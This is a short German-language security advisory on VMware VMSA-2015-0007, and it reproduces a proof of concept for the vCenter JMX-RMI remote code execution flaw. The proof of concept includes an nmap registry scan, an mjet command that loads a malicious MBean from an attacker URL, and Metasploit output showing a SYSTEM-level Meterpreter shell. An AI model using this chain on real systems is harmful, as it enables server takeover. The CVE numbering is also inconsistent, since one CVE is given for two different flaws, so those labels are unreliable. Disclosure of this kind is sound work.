Kritische Lücke in VMware vCenter Server und ESXi
Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047
CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.
Proof of Concept: root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST Nmap scan report for 1.1.1.2 Host is up (0.00036s latency). PORT STATE SERVICE 9875/tcp open java-rmi | rmi-dumpregistry: | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub | @1.1.1.2:50966 | extends | java.rmi.server.RemoteStub | extends |_ java.rmi.server.RemoteObject MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl --------------------------------------------------- MJET - Mogwai Security JMX Exploitation Toolkit 0.1 --------------------------------------------------- [+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ... [+] Connected: rmi://1.1.1.2 16 [+] Trying to create MLet bean... [+] Loaded javax.management.loading.MLet [+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl [+] Invoking: javax.management.loading.MLet.getMBeansFromURL [+] Loaded class: metasploit.Metasploit [+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK [+] Invoking: metasploit.Metasploit.run() [+] Done
Metasploit Shell ------------------------- 2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) > [*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl [*] Server started. [*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl [*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/ [*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar [*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar [*] Sending stage (30355 bytes) to 1.1.1.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000 2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: SYSTEM
CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5
CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.
Entsprechende Updates sind bei VMware bereits verfügbar.